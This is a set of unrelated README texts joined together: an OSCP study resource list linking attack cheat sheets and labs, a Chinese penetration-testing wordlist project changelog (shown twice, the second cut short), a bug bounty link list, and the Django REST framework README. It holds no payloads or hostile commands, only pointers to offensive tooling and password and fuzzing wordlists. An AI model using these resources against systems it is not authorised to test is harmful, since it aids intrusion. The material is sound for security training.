Exam Review](https://theslickgeek.com/oscp/) - [OSCP Preparation Notes](https://www.jpsecnetworks.com/category/oscp/) - [A Detailed Guide on OSCP Preparation – From Newbie to OSCP](http://niiconsulting.com/checkmate/2017/06/a-detail-guide-on-oscp-preparation-from-newbie-to-oscp/) - [My Fight for OSCP](https://alphacybersecurity.tech/my-fight-for-the-oscp/) - [The Ultimate OSCP Preparation Guide](https://johnjhacking.com/blog/the-oscp-preperation-guide-2020/) - [The Journey to Try Harder: TJnull’s Preparation Guide for PEN-200 PWK/OSCP 2.0](https://www.netsecfocus.com/oscp/2021/05/06/The_Journey_to_Try_Harder-_TJnull-s_Preparation_Guide_for_PEN-200_PWK_OSCP_2.0.html) ### Cheatsheets and Scripts - [Luke's Practical hacking tips and tricks](https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-3-practical-hacking-tips-and-tricks-c38486f5fc97) - [Penetration Testing Tools Cheat Sheet](https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/) - [How to Pass OSCP](https://gist.github.com/unfo/5ddc85671dcf39f877aaf5dce105fac3) - [Reverse Shell Cheat Sheet](https://highon.coffee/blog/reverse-shell-cheat-sheet/) - [Reverse Shell Generator](https://www.revshells.com/) - [7 Linux Shells Using Built-in Tools](https://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/) - [Windows Exploit Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester) - [Linux Exploit Suggester](https://github.com/InteliSecureLabs/Linux_Exploit_Suggester) - [OSCPRepo](https://github.com/rewardone/OSCPRepo) - [Go-for-OSCP](https://github.com/pythonmaster41/Go-For-OSCP) - [Pentest Compilation](https://github.com/adon90/pentest_compilation) - [Collection of OSCP scripts](https://github.com/ihack4falafel/OSCP) ### Topics #### Buffer Overflow - [Corelan's Exploit writing tutorial part 1 : Stack Based Overflows](https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/) - [Justin's DoStackBufferOverflowGood](https://github.com/justinsteven/dostackbufferoverflowgood) - [Writing Exploits for Win32 Systems from Scratch](https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/writing-exploits-for-win32-systems-from-scratch/) - [32-Bit Windows Buffer Overflows Made Easy](https://veteransec.com/2018/09/10/32-bit-windows-buffer-overflows-made-easy/) - [Introduction to Buffer Overflow Video](https://www.youtube.com/watch?v=1S0aBV-Waeo) - [OverTheWire's Narnia Wargame](http://overthewire.org/wargames/narnia/) #### Privilege Escalation - [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html) - [Common Windows Privilege Escalation Vectors](https://toshellandback.com/2015/11/24/ms-priv-esc/) - [Encyclopaedia Of Windows Privilege Escalation by Brett Moore](https://www.youtube.com/watch?v=kMG8IsCohHA) - [Level Up! Practical Windows Privilege Escalation by Andrew Smith](https://www.youtube.com/watch?v=PC_iMqiuIRQ) - [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) - [Linux privilege escalation by Jake Williams](https://www.youtube.com/watch?v=dk2wsyFiosg) #### Active-Directory - [Active Directory Methodology](https://book.hacktricks.xyz/windows/active-directory-methodology) - [Active Directory Exploitation Cheat Sheet](https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet) - [PayloadsAllTheThings AD](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md) - [Attacking Active Directory: 0 to 0.9](https://zer1t0.gitlab.io/posts/attacking_ad/) - [PowerView-3.0 tips and tricks](https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993#file-powerview-3-0-tricks-ps1) ##### Hands-On Resources. - TryHackMe - [Active Directory Basics](https://tryhackme.com/room/activedirectorybasics) - Easy - [Post-Exploitation Basics](https://tryhackme.com/room/postexploit) - Easy - [Vulnnet Roasted](https://tryhackme.com/room/vulnnetroasted) - Easy - [Attacktive Directory](https://tryhackme.com/room/attacktivedirectory) - Medium - [raz0r black](https://tryhackme.com/room/raz0rblack) - Medium - [Enterprise](https://tryhackme.com/room/enterprise) - Medium - [Vulnnet Active](https://tryhackme.com/room/vulnnetactive) - Medium - [Zero Logon](https://tryhackme.com/room/zer0logon) - Hard - [Holo](https://tryhackme.com/room/hololive) - Hard - [Throwback](https://tryhackme.com/network/throwback) - Easy - HackTheBox - [Forest](https://app.hackthebox.com/machines/212) - Easy - [Active](https://app.hackthebox.com/machines/148) - Easy - [Fuse](https://app.hackthebox.com/machines/235) - Medium - [Cascade](https://app.hackthebox.com/machines/235) - Medium - [Monteverde](https://app.hackthebox.com/machines/223) - Medium - [Resolute](https://app.hackthebox.com/machines/220) - Medium - [Arkham](https://app.hackthebox.com/machines/179) - Medium - [Mantis](https://app.hackthebox.com/machines/98) - Hard - [APT](https://app.hackthebox.com/machines/296) - Insane - [Dante](https://app.hackthebox.com/prolabs/overview/dante) - Beginner - [Offshore](https://app.hackthebox.com/prolabs/overview/offshore) - Intermediate - [RastaLabs](https://app.hackthebox.com/prolabs/overview/rastalabs) - Intermediate - [Cybernetics](https://app.hackthebox.com/prolabs/overview/cybernetics) - Advanced - [APT Labs](https://app.hackthebox.com/prolabs/overview/aptlabs) - Advanced - HackTheBox Academy ( PAID ) - [Introduction to Active Directory](https://academy.hackthebox.com/module/details/74) - Fundamental - [ActiveDirectory LDAP](https://academy.hackthebox.com/course/preview/active-directory-ldap) - Medium - [ActiveDirectory Powerview](https://academy.hackthebox.com/module/details/68) - Medium - [ActiveDirectory BloodHound](https://academy.hackthebox.com/module/details/69) - Medium - [ActiveDirectory Enumeration & Attacks](https://academy.hackthebox.com/module/details/143) - Medium - Proving Grounds - [PG-Practice](https://portal.offsec.com/labs/practice) ( PAID ) * Hutch * Heist * Vault # Other OSCP Resources - [PWK Syllabus](https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf) - [OSCP-Prep-Resources](https://github.com/burntmybagel/OSCP-Prep) - [Offensive Security Bookmarks](https://jivoi.github.io/2015/07/03/offensive-security-bookmarks/) - [The how to get the OSCP certification wiki](https://www.peerlyst.com/posts/the-how-to-get-the-oscp-certification-wiki-peerlyst) - [OSCP Goldmine](http://0xc0ffee.io/blog/OSCP-Goldmine) - [Penetration Testing Study Notes](https://github.com/AnasAboureada/Penetration-Testing-Study-Notes) - [OSCP-like Vulnhub VMs](https://www.abatchy.com/2017/02/oscp-like-vulnhub-vms) - [Metasploit Unleashed](https://www.offensive-security.com/metasploit-unleashed/) - [Awesome Penetration Testing](https://github.com/enaqx/awesome-pentest) - [OSCP Exam Report Template in Markdown](https://github.com/noraj/OSCP-Exam-Report-Template-Markdown) #### Books - [Penetration Testing: A Hands-on Introduction to Hacking](https://www.amazon.com/Penetration-Testing-Hands-Introduction-Hacking/dp/1593275641) - [The Hacker Playbook 3: Practical Guide to Penetration Testing](https://www.amazon.com.au/Hacker-Playbook-Practical-Penetration-Testing/dp/1980901759) - [RTFM: Red Team Field Manual](https://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504) - [The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws (2nd Edition)](https://www.amazon.com/Web-Application-Hackers-Handbook-Exploiting-ebook/dp/B005LVQA9S) ## License [![CC0](http://mirrors.creativecommons.org/presskit/buttons/88x31/svg/cc-zero.svg)](http://creativecommons.org/publicdomain/zero/1.0) To the extent possible under law, Adel &#34;0x4D31&#34; Karimi has waived all copyright and related or neighboring rights to this work.
# Dictionary-Of-Pentesting ## 简介 收集一些常用的字典,用于渗透测试、SRC漏洞挖掘、爆破、Fuzzing等实战中。 收集以实用为原则。目前主要分类有认证类、文件路径类、端口类、域名类、无线类、正则类。 涉及的内容包含设备默认密码、文件路径、通用默认密码、HTTP参数、HTTP请求头、正则、应用服务默认密码、子域名、用户名、系统密码、Wifi密码等。 该项目计划持续收集。 ## 更新记录 **2022.12.07** 1. 增加trickest/wordlists字典,主要包括robots.txt 文件中的disallow的路径汇总和168的子域名字典。 **2022.07.16** 1. k8s 路径 2. phpunit路径 3. properties 文件路径字典 4. yaml文件名字典 5. 用户名字段名称字典 **2022.05.08** 1. 增加 keys/secret 正则表达式 2. 增加Dom XSS sink **2021.12.14** 1. 增加EyeWitness的识别规则 **2021.10.04** 1. 增加Burp的Software Version Checks的识别规则 2. 增加Client-Side Prototype Pollution的规则(基于Burp的Software Version Checks插件) **2021.09.22** 1. 增加MQTT 爆破用的用户名和密码。 **2021.08.01** 1. 增加100余条CND列表 2. 系统命令执行Fuzzing payload **2021.07.30** 1. 增加19个cdn服务列表。 感谢@leveryd 提供 **2021.07.26** 1. 增加一个子域名爆破字典 **2021.06.23** 1. 一些开源Web应用的ViewState默认key。 2. upload 一些上传文件的参数名 **2021.06.18** 1. 增加Bug-Bounty-Wordlists **2021.06.06** 1. 增加SuperWordlist的用户名和密码字典。包括Tomcat、PMA、DEV等密码字典,还有CN、EN邮箱用户名、TOP20管理用户名。 2. 200万子域名字典 **2021.06.02** 1. 增加43个云waf或cdn列表 **2021.05.28** 1. 增加wappalyzer的指纹规则 **2021.04.28** 1. XXE payloads for specific DTDs **2021.04.26** 1. 增加云厂商的metadata有用的一些地址。(包含AWS、Google Cloud、Digital Ocean 、Packetcloud、Azure、Oracle Cloud 、Alibaba、OpenStack/RackSpace 、Oracle Cloud、Kubernetes) **2021.02.19** 1. 增加aem路径列表 **2021.02.07** 1. 增加top25 漏洞参数(SQLI/XSS/RCE/OPENREDIRECT/LFI/SSRF) **2021.02.04** 1. 增加all.txt 字典。 **2021.02.03** 1. 增加amass的子域名字典。 **2021.01.31** 1. 增加AllAboutBugBounty项目的文档 **2021.01.27** 1. 增加几个可能导致RCE的端口 **2021.01.24** 1. 增加两个github dork **2021.01.16** 1. 增加cve的一些路径 2. 一些已知错误配置的路径 3. 一些API端点或服务器信息的特殊路径 4. 以上3种的合集(去重后) **2021.01.13** 1. 增加callback参数字典 2. 增加常见报错信息字符串列表 3. 增加debug参数字典 4. 增加snmp密码字典 5. 增加weblogic常见用户名密码 6. 增加oracle用户名、密码字典 **2021.01.04** 1. 增加DefaultCreds-cheat-sheet **2021.01.03** 1. 增加crackstation下载地址(由于字典太大,给出下载链接)。 2. 增加rockyou字典。 3. 增加cain字典。 **2021.01.02** 1. 增加webshell密码字典 2. 增加7w和81万请求参数字典 3. 增加Lcoalhost地址字典 4. HTML标签列表 **2020.12.31** 1. 增加域账户弱密码字典(7000+) **2020.12.30** 1. 增加ntlm验证的路径 **2020.12.15** 1. 增加github dork的搜索脚本。 **2020.12.09** 1. 增加CEH web services的用户名和密码字典。 **2020.12.07** 1. 增加oracle路径列表 **2020.11.23** 1. 增加ctf字典。 2. 增加摄像rtsp默认路径和默认用户名和密码 **2020.11.14** 1. 增加1个ics 默认密码字典 2. 增加1个设备默认密码字典(3400余条) **2020.11.04** 1. 增加 Wordpress BruteForc List **2020.11.03** 1. 增加几个默认口令 **2020.10.15** 1. 增加一些payload **2020.09.30** 1. 增加常见可以RCE的端口 **2020.09.29** 1. bugbounty oneliner rce 2. 一些默认路径 3. top 100k 密码字典 4. top 5k 用户名字典 5. 一些代码审计正则表达式 **2020.09.27** 1. 增加cms识别指纹规则集,包含 fofa/Wappalyzer/WEBEYE/web中间件/开发语言 等众多指纹库内容 **2020.09.22** 1. 修改swagger字典,添加5条路径 **2020.09.21** 1. 增加3种类型密码字典,拼音、纯数字、键盘密码字典 2. 增加scada 默认密码,硬编码等列表 **2020.09.18** 1. 增加11k+用户名密码组合 **2020.09.17** 1. 增加action后缀 top 100 2. javascript 中on事件列表 3. URL 16进制fuzz **2020.09.15** 1. 增加XXE bruteforce wordlist 2. 增加sql备份文件名字典 3. 删除重复的spring boot内容 **2020.09.10** 1. 增加自己收集的webservices内容。包含webservices目录,文件名,拓展名。后续计划增加存在漏洞webservices路径内容 2. readme中增加更新历史 **2020.09.09** 1. 增加weblogic路径 2. 增加swagger路径 3. 增加graphql路径 4. 增加spring-boot路径 5. 去掉device/default_password_list.txt文件中的空行 **2020.09.08** 1. 更新jsFileDict.txt字典,增加4个js文件名 **2020.09.07** 1. 添加绕过ip限制的http请求投 2. 修改readme.md **2020.08.29** 1. 增加常见设备、安全产品默认口令 2. 增加一行命令的BugBounty tips 3. 增加两处参数字典 4. 增加bruteforce-lists的字典 5. Readme 文件增加来源。逐渐完善。 **2020.08.28** 1. 增加api路径 2. 增加js文件路径 3. 增加http请求参数 4. 增加http请求参数值 **2020.08.27** 1. 删除一些多余文件 2. 精简Files下的dict的层级 3. 增加DirBuster字典 4. 增加spring boot actuator字典 **2020.08.26** 首次提交 ## 来源&致谢 该项目内容均来源于网络或自己整理,感谢各位大佬们的共享精神和辛苦付出~ * [https://github.com/maurosoria/dirsearch](https://github.com/maurosoria/dirsearch) * [https://github.com/dwisiswant0/awesome-oneliner-bugbounty](https://github.com/dwisiswant0/awesome-oneliner-bugbounty) * [https://github.com/internetwache/CT_subdomains](https://github.com/internetwache/CT_subdomains) * [https://github.com/lijiejie/subDomainsBrute](https://github.com/lijiejie/subDomainsBrute) * [https://github.com/shmilylty/OneForAll](https://github.com/shmilylty/OneForAll) * [https://github.com/random-robbie/bruteforce-lists](https://github.com/random-robbie/bruteforce-lists) * [https://github.com/dwisiswant0/awesome-oneliner-bugbounty](https://github.com/dwisiswant0/awesome-oneliner-bugbounty) * [https://github.com/OfJAAH/KingOfBugBountyTips](https://github.com/OfJAAH/KingOfBugBountyTips) * [https://github.com/danielmiessler/SecLists](https://github.com/danielmiessler/SecLists) * [https://github.com/TheKingOfDuck/fuzzDicts](https://github.com/TheKingOfDuck/fuzzDicts) * [https://github.com/NS-Sp4ce/Dict](https://github.com/NS-Sp4ce/Dict) * [https://github.com/s0md3v/Arjun](https://github.com/s0md3v/Arjun) * [https://github.com/fuzzdb-project/fuzzdb](https://github.com/fuzzdb-project/fuzzdb) * [https://github.com/YasserGersy/Enums/](https://github.com/YasserGersy/Enums/) * [https://gist.github.com/honoki/d7035c3ccca1698ec7b541c77b9410cf](https://gist.github.com/honoki/d7035c3ccca1698ec7b541c77b9410cf) * [https://twitter.com/DanielAzulay18/status/1304751830539395072](https://twitter.com/DanielAzulay18/status/1304751830539395072) * [https://github.com/cwkiller/Pentest_Dic](https://github.com/cwkiller/Pentest_Dic) * [https://github.com/huyuanzhi2/password_brute_dictionary](https://github.com/huyuanzhi2/password_brute_dictionary) * [https://github.com/Clear2020/icsmaster/](https://github.com/Clear2020/icsmaster/) * [https://github.com/LandGrey/SpringBootVulExploit](https://github.com/LandGrey/SpringBootVulExploit) * [https://github.com/al0ne/Vxscan][https://github.com/al0ne/Vxscan] * [https://github.com/L0kiii/FofaScan](https://github.com/L0kiii/FofaScan) * [https://github.com/nw01f/CmsIdentification-masterV2](https://github.com/nw01f/CmsIdentification-masterV2) * [https://github.com/Lucifer1993/cmsprint](https://github.com/Lucifer1993/cmsprint) * [https://github.com/erwanlr/Fingerprinter](https://github.com/erwanlr/Fingerprinter) * [https://github.com/lewiswu1209/fingerprint](https://github.com/lewiswu1209/fingerprint) * [https://github.com/shelld3v/RCE-python-oneliner-payload](https://github.com/shelld3v/RCE-python-oneliner-payload) * [https://twitter.com/ptswarm/status/1311310897592315905](https://twitter.com/ptswarm/status/1311310897592315905) * [https://github.com/xer0days/BugBounty](https://github.com/xer0days/BugBounty) * [https://twitter.com/ptswarm/status/1323266632920256512](https://twitter.com/ptswarm/status/1323266632920256512) * [https://github.com/kongsec/Wordpress-BruteForce-List/](https://github.com/kongsec/Wordpress-BruteForce-List/) * [https://github.com/nyxxxie/awesome-default-passwords](https://github.com/nyxxxie/awesome-default-passwords) * [https://github.com/arnaudsoullie/ics-default-passwords](https://github.com/arnaudsoullie/ics-default-passwords) * [https://github.com/Ullaakut/cameradar](https://github.com/Ullaakut/cameradar) * [https://github.com/pwnfoo/NTLMRecon](https://github.com/pwnfoo/NTLMRecon) * [https://github.com/chroblert/domainWeakPasswdCheck](https://github.com/chroblert/domainWeakPasswdCheck/) * [https://github.com/gh0stkey/Web-Fuzzing-Box](https://github.com/gh0stkey/Web-Fuzzing-Box) * [https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm](https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm) * [https://github.com/ihebski/DefaultCreds-cheat-sheet](https://github.com/ihebski/DefaultCreds-cheat-sheet) * [https://github.com/epony4c/Exploit-Dictionary](https://github.com/epony4c/Exploit-Dictionary) * [https://github.com/ayoubfathi/leaky-paths](https://github.com/ayoubfathi/leaky-paths) * [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker) * [https://github.com/daffainfo/AllAboutBugBounty](https://github.com/daffainfo/AllAboutBugBounty) * [https://github.com/OWASP/Amass](https://github.com/OWASP/Amass) * [https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056](https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056) * [https://github.com/lutfumertceylan/top25-parameter](https://github.com/lutfumertceylan/top25-parameter) * [https://github.com/clarkvoss/AEM-List](https://github.com/clarkvoss/AEM-List) * [https://gist.github.com/BuffaloWill/fa96693af67e3a3dd3fb](https://gist.github.com/BuffaloWill/fa96693af67e3a3dd3fb) * [https://raw.githubusercontent.com/GoSecure/dtd-finder/master/list/xxe_payloads.md](https://raw.githubusercontent.com/GoSecure/dtd-finder/master/list/xxe_payloads.md) * [https://raw.githubusercontent.com/AliasIO/wappalyzer/master/src/technologies.json](https://raw.githubusercontent.com/AliasIO/wappalyzer/master/src/technologies.json) * [https://github.com/fuzz-security/SuperWordlist](https://github.com/fuzz-security/SuperWordlist) * [https://wordlists.assetnote.io/](https://wordlists.assetnote.io/) * [https://github.com/Karanxa/Bug-Bounty-Wordlists](https://github.com/Karanxa/Bug-Bounty-Wordlists) * [https://github.com/yuanhaiGreg/Fuzz-Dict](https://github.com/yuanhaiGreg/Fuzz-Dict) * [https://github.com/MistSpark/DNS-Wordlists](https://github.com/MistSpark/DNS-Wordlists) * [https://github.com/0x727/ShuiZe_0x727/blob/master/Plugins/infoGather/subdomain/CDN/cdn-domain.conf](https://github.com/0x727/ShuiZe_0x727/blob/master/Plugins/infoGather/subdomain/CDN/cdn-domain.conf) * [https://github.com/omurugur/OS_Command_Payload_List](https://github.com/omurugur/OS_Command_Payload_List) * [https://github.com/akamai-threat-research/mqtt-pwn](https://github.com/akamai-threat-research/mqtt-pwn) * [https://github.com/BlackFan/cspp-tools](https://github.com/BlackFan/cspp-tools) * [https://github.com/augustd/burp-suite-software-version-checks](https://github.com/augustd/burp-suite-software-version-checks) * [https://github.com/FortyNorthSecurity/EyeWitness/](https://github.com/FortyNorthSecurity/EyeWitness/) * [https://gist.github.com/h4x0r-dz/be69c7533075ab0d3f0c9b97f7c93a59](https://gist.github.com/h4x0r-dz/be69c7533075ab0d3f0c9b97f7c93a59) * [https://github.com/Karanxa/Bug-Bounty-Wordlists](https://github.com/Karanxa/Bug-Bounty-Wordlists) * [https://github.com/trickest/wordlists](https://github.com/trickest/wordlists)
# Bug Bounty Tips and Information ## Getting Started - [Bug Bounties 101](https://whitton.io/articles/bug-bounties-101-getting-started/) - [The life of a bug bounty hunter](http://www.alphr.com/features/378577/q-a-the-life-of-a-bug-bounty-hunter) - [Awesome list of bugbounty cheatsheets](https://github.com/EdOverflow/bugbounty-cheatsheet) - [Getting Started - Bug Bounty Hunter Methodology](https://www.bugcrowd.com/blog/getting-started-bug-bounty-hunter-methodology) - [How to Become a Successful Bug Bounty Hunter](https://hackerone.com/blog/what-great-hackers-share) - [Researcher Resources - How to become a Bug Bounty Hunter](https://forum.bugcrowd.com/t/researcher-resources-how-to-become-a-bug-bounty-hunter/1102) ## Write Ups and Walkthroughs - [Awesome Bug Bounty Writeups](https://github.com/devanshbatham/Awesome-Bugbounty-Writeups) ## Bug Bounty Platforms - [AntiHACK](https://www.antihack.me/) - [Bounty Factory](https://bountyfactory.io/) - [Bountysource](https://www.bountysource.com/) - [BugbountyHQ](https://www.bugbountyhq.com/) - [Bugbountyjp](https://bugbounty.jp/) - [Bugcrowd](https://bugcrowd.com/) - [CESPPA](https://www.cesppa.com/) - [Cobalt](https://cobalt.io/) - [Coder Bounty](http://www.coderbounty.com/) - [Detectify](https://cs.detectify.com/) - [FOSS Factory](http://www.fossfactory.org/) - [FreedomSponsors](https://freedomsponsors.org/) - [HackenProof](https://hackenproof.com/) - [Hackerhive](https://hackerhive.io/) - [HackerOne](https://hackerone.com/) - [Hacktrophy](https://hacktrophy.com/) - [intigriti](https://intigriti.com/) - [RedStorm](https://redstorm.io) - [Safehats](https://safehats.com/) - [Synack](https://www.synack.com/) - [YesWeHack](https://yeswehack.com/)
# [Django REST framework][docs] [![build-status-image]][travis] [![pypi-version]][pypi] **Awesome web-browsable Web APIs.** Full documentation for the project is available at [http://www.django-rest-framework.org][docs]. --- **Note**: We have now released Django REST framework 3.0. For older codebases you may want to refer to the version 2.4.4 [source code](https://github.com/tomchristie/django-rest-framework/tree/version-2.4.x), and [documentation](http://tomchristie.github.io/rest-framework-2-docs/). --- # Overview Django REST framework is a powerful and flexible toolkit for building Web APIs. Some reasons you might want to use REST framework: * The [Web browsable API][sandbox] is a huge usability win for your developers. * [Authentication policies][authentication] including optional packages for [OAuth1a][oauth1-section] and [OAuth2][oauth2-section]. * [Serialization][serializers] that supports both [ORM][modelserializer-section] and [non-ORM][serializer-section] data sources. * Customizable all the way down - just use [regular function-based views][functionview-section] if you don't need the [more][generic-views] [powerful][viewsets] [features][routers]. * [Extensive documentation][index], and [great community support][group]. There is a live example API for testing purposes, [available here][sandbox]. **Below**: *Screenshot from the browsable API* ![Screenshot][image] # Requirements * Python (2.6.5+, 2.7, 3.2, 3.3, 3.4) * Django (1.4.11+, 1.5.6+, 1.6.3+, 1.7, 1.8-alpha) # Installation Install using `pip`... pip install djangorestframework Add `'rest_framework'` to your `INSTALLED_APPS` setting. INSTALLED_APPS = ( ... 'rest_framework', ) # Example Let's take a look at a quick example of using REST framework to build a simple model-backed API for accessing users and groups. Startup up a new project like so... pip install django pip install djangorestframework django-admin.py startproject example . ./manage.py syncdb Now edit the `example/urls.py` module in your project: ```python from django.conf.urls import url, include from django.contrib.auth.models import User from rest_framework import serializers, viewsets, routers # Serializers define the API representation. class UserSerializer(serializers.HyperlinkedModelSerializer): class Meta: model = User fields = ('url', 'username', 'email', 'is_staff') # ViewSets define the view behavior. class UserViewSet(viewsets.ModelViewSet): queryset = User.objects.all() serializer_class = UserSerializer # Routers provide a way of automatically determining the URL conf. router = routers.DefaultRouter() router.register(r'users', UserViewSet) # Wire up our API using automatic URL routing. # Additionally, we include login URLs for the browsable API. urlpatterns = [ url(r'^', include(router.urls)), url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')) ] ``` We'd also like to configure a couple of settings for our API. Add the following to your `settings.py` module: ```python INSTALLED_APPS = ( ... # Make sure to include the default installed apps here. 'rest_framework', ) REST_FRAMEWORK = { # Use Django's standard `django.contrib.auth` permissions, # or allow read-only access for unauthenticated users. 'DEFAULT_PERMISSION_CLASSES': [ 'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly' ] } ``` That's it, we're done! ./manage.py runserver You can now open the API in your browser at `http://127.0.0.1:8000/`, and view your new 'users' API. If you use the `Login` control in the top right corner you'll also be able to add, create and delete users from the system. You can also interact with the API using command line tools such as [`curl`](http://curl.haxx.se/). For example, to list the users endpoint: $ curl -H 'Accept: application/json; indent=4' -u admin:password http://127.0.0.1:8000/users/ [ { "url": "http://127.0.0.1:8000/users/1/", "username": "admin", "email": "[email protected]", "is_staff": true, } ] Or to create a new user: $ curl -X POST -d username=new -d [email protected] -d is_staff=false -H 'Accept: application/json; indent=4' -u admin:password http://127.0.0.1:8000/users/ { "url": "http://127.0.0.1:8000/users/2/", "username": "new", "email": "[email protected]", "is_staff": false, } # Documentation & Support Full documentation for the project is available at [http://www.django-rest-framework.org][docs]. For questions and support, use the [REST framework discussion group][group], or `#restframework` on freenode IRC. You may also want to [follow the author on Twitter][twitter]. # Security If you believe you’ve found something in Django REST framework which has security implications, please **do not raise the issue in a public forum**. Send a description of the issue via email to [[email protected]][security-mail]. The project maintainers will then work with you to resolve any issues where required, prior to any public disclosure. # License Copyright (c) 2011-2015, Tom Christie All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. [build-status-image]: https://secure.travis-ci.org/tomchristie/django-rest-framework.svg?branch=master [travis]: http://travis-ci.org/tomchristie/django-rest-framework?branch=master [pypi-version]: https://pypip.in/version/djangorestframework/badge.svg [pypi]: https://pypi.python.org/pypi/djangorestframework [twitter]: https://twitter.com/_tomchristie [group]: https://groups.google.com/forum/?fromgroups#!forum/django-rest-framework [0.4]: https://github.com/tomchristie/django-rest-framework/tree/0.4.X [sandbox]: http://restframework.herokuapp.com/ [index]: http://www.django-rest-framework.org/ [oauth1-section]: http://www.django-rest-framework.org/api-guide/authentication/#django-rest-framework-oauth [oauth2-section]: http://www.django-rest-framework.org/api-guide/authentication/#django-oauth-toolkit [serializer-section]: http://www.django-rest-framework.org/api-guide/serializers/#serializers [modelserializer-section]: http://www.django-rest-framework.org/api-guide/serializers/#modelserializer [functionview-section]: http://www.django-rest-framework.org/api-guide/views/#function-based-views [generic-views]: http://www.django-rest-framework.org/api-guide/generic-views/ [viewsets]: http://www.django-rest-framework.org/api-guide/viewsets/ [routers]: http://www.django-rest-framework.org/api-guide/routers/ [serializers]: http://www.django-rest-framework.org/api-guide/serializers/ [authentication]: http://www.django-rest-framework.org/api-guide/authentication/ [rest-framework-2-announcement]: http://www.django-rest-framework.org/topics/rest-framework-2-announcement/ [2.1.0-notes]: https://groups.google.com/d/topic/django-rest-framework/Vv2M0CMY9bg/discussion [image]: http://www.django-rest-framework.org/img/quickstart.png [tox]: http://testrun.org/tox/latest/ [tehjones]: https://twitter.com/tehjones/status/294986071979196416 [wlonk]: https://twitter.com/wlonk/status/261689665952833536 [laserllama]: https://twitter.com/laserllama/status/328688333750407168 [docs]: http://www.django-rest-framework.org/ [urlobject]: https://github.com/zacharyvoase/urlobject [markdown]: http://pypi.python.org/pypi/Markdown/ [django-filter]: http://pypi.python.org/pypi/django-filter [security-mail]: mailto:[email protected]
# Dictionary-Of-Pentesting ## 简介 收集一些常用的字典,用于渗透测试、SRC漏洞挖掘、爆破、Fuzzing等实战中。 收集以实用为原则。目前主要分类有认证类、文件路径类、端口类、域名类、无线类、正则类。 涉及的内容包含设备默认密码、文件路径、通用默认密码、HTTP参数、HTTP请求头、正则、应用服务默认密码、子域名、用户名、系统密码、Wifi密码等。 该项目计划持续收集。 ## 更新记录 **2021.10.04** 1. 增加Burp的Software Version Checks的识别规则 2. 增加Client-Side Prototype Pollution的规则(基于Burp的Software Version Checks插件) **2021.09.22** 1. 增加MQTT 爆破用的用户名和密码。 **2021.08.01** 1. 增加100余条CND列表 2. 系统命令执行Fuzzing payload **2021.07.30** 1. 增加19个cdn服务列表。 感谢@leveryd 提供 **2021.07.26** 1. 增加一个子域名爆破字典 **2021.06.23** 1. 一些开源Web应用的ViewState默认key。 2. upload 一些上传文件的参数名 **2021.06.18** 1. 增加Bug-Bounty-Wordlists **2021.06.06** 1. 增加SuperWordlist的用户名和密码字典。包括Tomcat、PMA、DEV等密码字典,还有CN、EN邮箱用户名、TOP20管理用户名。 2. 200万子域名字典 **2021.06.02** 1. 增加43个云waf或cdn列表 **2021.05.28** 1. 增加wappalyzer的指纹规则 **2021.04.28** 1. XXE payloads for specific DTDs **2021.04.26** 1. 增加云厂商的metadata有用的一些地址。(包含AWS、Google Cloud、Digital Ocean 、Packetcloud、Azure、Oracle Cloud 、Alibaba、OpenStack/RackSpace 、Oracle Cloud、Kubernetes) **2021.02.19** 1. 增加aem路径列表 **2021.02.07** 1. 增加top25 漏洞参数(SQLI/XSS/RCE/OPENREDIRECT/LFI/SSRF) **2021.02.04** 1. 增加all.txt 字典。 **2021.02.03** 1. 增加amass的子域名字典。 **2021.01.31** 1. 增加AllAboutBugBounty项目的文档 **2021.01.27** 1. 增加几个可能导致RCE的端口 **2021.01.24** 1. 增加两个github dork **2021.01.16** 1. 增加cve的一些路径 2. 一些已知错误配置的路径 3. 一些API端点或服务器信息的特殊路径 4. 以上3种的合集(去重后) **2021.01.13** 1. 增加callback参数字典 2. 增加常见报错信息字符串列表 3. 增加debug参数字典 4. 增加snmp密码字典 5. 增加weblogic常见用户名密码 6. 增加oracle用户名、密码字典 